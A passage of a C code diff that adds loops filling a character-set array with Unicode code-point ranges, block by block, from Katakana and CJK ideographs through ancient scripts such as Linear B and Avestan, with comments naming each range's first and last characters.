+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+// 10000..1007F; Linear B Syllabary
+	c = 0x10000;		// from LINEAR B SYLLABLE B008 A
+	while (c <= 0x1000b)	// ..to LINEAR B SYLLABLE B046 JE
+		charset[i++] = c++;
+	c = 0x1000d;		// from LINEAR B SYLLABLE B036 JO
+	while (c <= 0x10026)	// ..to LINEAR B SYLLABLE B032 QO
+		charset[i++] = c++;
+	c = 0x10028;		// from LINEAR B SYLLABLE B060 RA
+	while (c <= 0x1003a)	// ..to LINEAR B SYLLABLE B042 WO
+		charset[i++] = c++;
+	charset[i++] = 0x1003c;	// LINEAR B SYLLABLE B017 ZA
+	charset[i++] = 0x1003d;	// LINEAR B SYLLABLE B074 ZE
+	c = 0x1003f;		// from LINEAR B SYLLABLE B020 ZO
+	while (c <= 0x1004d)	// ..to LINEAR B SYLLABLE B091 TWO
+		charset[i++] = c++;
+	c = 0x10050;		// from LINEAR B SYMBOL B018
+	while (c <= 0x1005d)	// ..to LINEAR B SYMBOL B089
+		charset[i++] = c++;
+// 10080..100FF; Linear B Ideograms
+	c = 0x10080;		// from LINEAR B IDEOGRAM B100 MAN
+	while (c <= 0x100fa)	// ..to LINEAR B IDEOGRAM VESSEL B305
+		charset[i++] = c++;
+// 10100..1013F; Aegean Numbers
+	charset[i++] = 0x10100;	// AEGEAN WORD SEPARATOR LINE
+	charset[i++] = 0x10102;	// AEGEAN CHECK MARK
+	c = 0x10107;		// from AEGEAN NUMBER ONE
+	while (c <= 0x10133)	// ..to AEGEAN NUMBER NINETY THOUSAND
+		charset[i++] = c++;
+	c = 0x10137;		// from AEGEAN WEIGHT BASE UNIT
+	while (c <= 0x1013f)	// ..to AEGEAN MEASURE THIRD SUBUNIT
+		charset[i++] = c++;
+// 10140..1018F; Ancient Greek Numbers
+	c = 0x10140;		// from GREEK ACROPHONIC ATTIC ONE QUARTER
+	while (c <= 0x1018e)	// ..to NOMISMA SIGN
+		charset[i++] = c++;
+// 10190..101CF; Ancient Symbols
+	c = 0x10190;		// from ROMAN SEXTANS SIGN
+	while (c <= 0x1019b)	// ..to ROMAN CENTURIAL SIGN
+		charset[i++] = c++;
+	charset[i++] = 0x101a0;	// GREEK SYMBOL TAU RHO
+// 101D0..101FF; Phaistos Disc
+	c = 0x101d0;		// from PHAISTOS DISC SIGN PEDESTRIAN
+	while (c <= 0x101fd)	// ..to PHAISTOS DISC SIGN COMBINING OBLIQUE STROKE
+		charset[i++] = c++;
+// 10280..1029F; Lycian
+	c = 0x10280;		// from LYCIAN LETTER A
+	while (c <= 0x1029c)	// ..to LYCIAN LETTER X
+		charset[i++] = c++;
+// 102A0..102DF; Carian
+	c = 0x102a0;		// from CARIAN LETTER A
+	while (c <= 0x102d0)	// ..to CARIAN LETTER UUU3
+		charset[i++] = c++;
+// 102E0..102FF; Coptic Epact Numbers
+	c = 0x102e0;		// from COPTIC EPACT THOUSANDS MARK
+	while (c <= 0x102fb)	// ..to COPTIC EPACT NUMBER NINE HUNDRED
+		charset[i++] = c++;
+// 10300..1032F; Old Italic
+	c = 0x10300;		// from OLD ITALIC LETTER A
+	while (c <= 0x10323)	// ..to OLD ITALIC NUMERAL FIFTY
+		charset[i++] = c++;
+	charset[i++] = 0x1032d;	// OLD ITALIC LETTER YE
+	charset[i++] = 0x1032f;	// OLD ITALIC LETTER SOUTHERN TSE
+// 10330..1034F; Gothic
+	c = 0x10330;		// from GOTHIC LETTER AHSA
+	while (c <= 0x1034a)	// ..to GOTHIC LETTER NINE HUNDRED
+		charset[i++] = c++;
+// 10350..1037F; Old Permic
+	c = 0x10350;		// from OLD PERMIC LETTER AN
+	while (c <= 0x1037a)	// ..to COMBINING OLD PERMIC LETTER SII
+		charset[i++] = c++;
+// 10380..1039F; Ugaritic
+	c = 0x10380;		// from UGARITIC LETTER ALPA
+	while (c <= 0x1039d)	// ..to UGARITIC LETTER SSU
+		charset[i++] = c++;
+	charset[i++] = 0x1039f;	// UGARITIC WORD DIVIDER
+// 103A0..103DF; Old Persian
+	c = 0x103a0;		// from OLD PERSIAN SIGN A
+	while (c <= 0x103c3)	// ..to OLD PERSIAN SIGN HA
+		charset[i++] = c++;
+	c = 0x103c8;		// from OLD PERSIAN SIGN AURAMAZDAA
+	while (c <= 0x103d5)	// ..to OLD PERSIAN NUMBER HUNDRED
+		charset[i++] = c++;
+// 10400..1044F; Deseret
+	c = 0x10400;		// from DESERET CAPITAL LETTER LONG I
+	while (c <= 0x1044f)	// ..to DESERET SMALL LETTER EW
+		charset[i++] = c++;
+// 10450..1047F; Shavian
+	c = 0x10450;		// from SHAVIAN LETTER PEEP
+	while (c <= 0x1047f)	// ..to SHAVIAN LETTER YEW
+		charset[i++] = c++;
+// 10480..104AF; Osmanya
+	c = 0x10480;		// from OSMANYA LETTER ALEF
+	while (c <= 0x1049d)	// ..to OSMANYA LETTER OO
+		charset[i++] = c++;
+	c = 0x104a0;		// from OSMANYA DIGIT ZERO
+	while (c <= 0x104a9)	// ..to OSMANYA DIGIT NINE
+		charset[i++] = c++;
+// 104B0..104FF; Osage
+	c = 0x104b0;		// from OSAGE CAPITAL LETTER A
+	while (c <= 0x104d3)	// ..to OSAGE CAPITAL LETTER ZHA
+		charset[i++] = c++;
+	c = 0x104d8;		// from OSAGE SMALL LETTER A
+	while (c <= 0x104fb)	// ..to OSAGE SMALL LETTER ZHA
+		charset[i++] = c++;
+// 10500..1052F; Elbasan
+	c = 0x10500;		// from ELBASAN LETTER A
+	while (c <= 0x10527)	// ..to ELBASAN LETTER KHE
+		charset[i++] = c++;
+// 10530..1056F; Caucasian Albanian
+	c = 0x10530;		// from CAUCASIAN ALBANIAN LETTER ALT
+	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
+		charset[i++] = c++;
+	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10600..1077F; Linear A
+	c = 0x10600;		// from LINEAR A SIGN AB001
+	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
+		charset[i++] = c++;
+	c = 0x10740;		// from LINEAR A SIGN A701 A
+	while (c <= 0x10755)	// ..to LINEAR A SIGN A732 JE
+		charset[i++] = c++;
+	c = 0x10760;		// from LINEAR A SIGN A800
+	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
+		charset[i++] = c++;
+// 10800..1083F; Cypriot Syllabary
+	c = 0x10800;		// from CYPRIOT SYLLABLE A
+	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
+		charset[i++] = c++;
+	c = 0x1080a;		// from CYPRIOT SYLLABLE KA
+	while (c <= 0x10835)	// ..to CYPRIOT SYLLABLE WO
+		charset[i++] = c++;
+	charset[i++] = 0x10837;	// CYPRIOT SYLLABLE XA
+	charset[i++] = 0x10838;	// CYPRIOT SYLLABLE XE
+	c = 0x1083c;		// from CYPRIOT SYLLABLE ZA
+	while (c <= 0x1083f)	// ..to CYPRIOT SYLLABLE ZO
+		charset[i++] = c++;
+// 10840..1085F; Imperial Aramaic
+	c = 0x10840;		// from IMPERIAL ARAMAIC LETTER ALEPH
+	while (c <= 0x10855)	// ..to IMPERIAL ARAMAIC LETTER TAW
+		charset[i++] = c++;
+	c = 0x10857;		// from IMPERIAL ARAMAIC SECTION SIGN
+	while (c <= 0x1085f)	// ..to IMPERIAL ARAMAIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 10860..1087F; Palmyrene
+	c = 0x10860;		// from PALMYRENE LETTER ALEPH
+	while (c <= 0x1087f)	// ..to PALMYRENE NUMBER TWENTY
+		charset[i++] = c++;
+// 10880..108AF; Nabataean
+	c = 0x10880;		// from NABATAEAN LETTER FINAL ALEPH
+	while (c <= 0x1089e)	// ..to NABATAEAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x108a7;		// from NABATAEAN NUMBER ONE
+	while (c <= 0x108af)	// ..to NABATAEAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 108E0..108FF; Hatran
+	c = 0x108e0;		// from HATRAN LETTER ALEPH
+	while (c <= 0x108f2)	// ..to HATRAN LETTER QOPH
+		charset[i++] = c++;
+	charset[i++] = 0x108f4;	// HATRAN LETTER SHIN
+	charset[i++] = 0x108f5;	// HATRAN LETTER TAW
+	c = 0x108fb;		// from HATRAN NUMBER ONE
+	while (c <= 0x108ff)	// ..to HATRAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10900..1091F; Phoenician
+	c = 0x10900;		// from PHOENICIAN LETTER ALF
+	while (c <= 0x1091b)	// ..to PHOENICIAN NUMBER THREE
+		charset[i++] = c++;
+	charset[i++] = 0x1091f;	// PHOENICIAN WORD SEPARATOR
+// 10920..1093F; Lydian
+	c = 0x10920;		// from LYDIAN LETTER A
+	while (c <= 0x10939)	// ..to LYDIAN LETTER C
+		charset[i++] = c++;
+	charset[i++] = 0x1093f;	// LYDIAN TRIANGULAR MARK
+// 10980..1099F; Meroitic Hieroglyphs
+	c = 0x10980;		// from MEROITIC HIEROGLYPHIC LETTER A
+	while (c <= 0x1099f)	// ..to MEROITIC HIEROGLYPHIC SYMBOL VIDJ-2
+		charset[i++] = c++;
+// 109A0..109FF; Meroitic Cursive
+	c = 0x109a0;		// from MEROITIC CURSIVE LETTER A
+	while (c <= 0x109b7)	// ..to MEROITIC CURSIVE LETTER DA
+		charset[i++] = c++;
+	c = 0x109bc;		// from MEROITIC CURSIVE FRACTION ELEVEN TWELFTHS
+	while (c <= 0x109cf)	// ..to MEROITIC CURSIVE NUMBER SEVENTY
+		charset[i++] = c++;
+	c = 0x109d2;		// from MEROITIC CURSIVE NUMBER ONE HUNDRED
+	while (c <= 0x109ff)	// ..to MEROITIC CURSIVE FRACTION TEN TWELFTHS
+		charset[i++] = c++;
+// 10A00..10A5F; Kharoshthi
+	c = 0x10a00;		// from KHAROSHTHI LETTER A
+	while (c <= 0x10a03)	// ..to KHAROSHTHI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x10a05;	// KHAROSHTHI VOWEL SIGN E
+	charset[i++] = 0x10a06;	// KHAROSHTHI VOWEL SIGN O
+	c = 0x10a0c;		// from KHAROSHTHI VOWEL LENGTH MARK
+	while (c <= 0x10a13)	// ..to KHAROSHTHI LETTER GHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a15;	// KHAROSHTHI LETTER CA
+	charset[i++] = 0x10a17;	// KHAROSHTHI LETTER JA
+	c = 0x10a19;		// from KHAROSHTHI LETTER NYA
+	while (c <= 0x10a35)	// ..to KHAROSHTHI LETTER VHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a38;	// KHAROSHTHI SIGN BAR ABOVE
+	charset[i++] = 0x10a3a;	// KHAROSHTHI SIGN DOT BELOW
+	c = 0x10a3f;		// from KHAROSHTHI VIRAMA
+	while (c <= 0x10a48)	// ..to KHAROSHTHI FRACTION ONE HALF
+		charset[i++] = c++;
+	c = 0x10a50;		// from KHAROSHTHI PUNCTUATION DOT
+	while (c <= 0x10a58)	// ..to KHAROSHTHI PUNCTUATION LINES
+		charset[i++] = c++;
+// 10A60..10A7F; Old South Arabian
+	c = 0x10a60;		// from OLD SOUTH ARABIAN LETTER HE
+	while (c <= 0x10a7f)	// ..to OLD SOUTH ARABIAN NUMERIC INDICATOR
+		charset[i++] = c++;
+// 10A80..10A9F; Old North Arabian
+	c = 0x10a80;		// from OLD NORTH ARABIAN LETTER HEH
+	while (c <= 0x10a9f)	// ..to OLD NORTH ARABIAN NUMBER TWENTY
+		charset[i++] = c++;
+// 10AC0..10AFF; Manichaean
+	c = 0x10ac0;		// from MANICHAEAN LETTER ALEPH
+	while (c <= 0x10ae6)	// ..to MANICHAEAN ABBREVIATION MARK BELOW
+		charset[i++] = c++;
+	c = 0x10aeb;		// from MANICHAEAN NUMBER ONE
+	while (c <= 0x10af6)	// ..to MANICHAEAN PUNCTUATION LINE FILLER
+		charset[i++] = c++;
+// 10B00..10B3F; Avestan
+	c = 0x10b00;		// from AVESTAN LETTER A
+	while (c <= 0x10b35)	// ..to AVESTAN LETTER HE
+		charset[i++] = c++;
+	c = 0x10b39;		// from AVESTAN ABBREVIATION MARK
+	while (c <= 0x10b3f)	// ..to LARGE ONE RING OVER TWO RINGS PUNCTUATION
+		charset[i++] = c++;
+// 10B40..10B5F; Inscriptional Parthian
+	c = 0x10b40;		// from INSCRIPTIONAL PARTHIAN LETTER ALEPH
+	while (c <= 0x10b55)	// ..to INSCRIPTIONAL PARTHIAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b58;		// from INSCRIPTIONAL PARTHIAN NUMBER ONE
+	while (c <= 0x10b5f)	// ..to INSCRIPTIONAL PARTHIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B60..10B7F; Inscriptional Pahlavi
+	c = 0x10b60;		// from INSCRIPTIONAL PAHLAVI LETTER ALEPH
+	while (c <= 0x10b72)	// ..to INSCRIPTIONAL PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b78;		// from INSCRIPTIONAL PAHLAVI NUMBER ONE
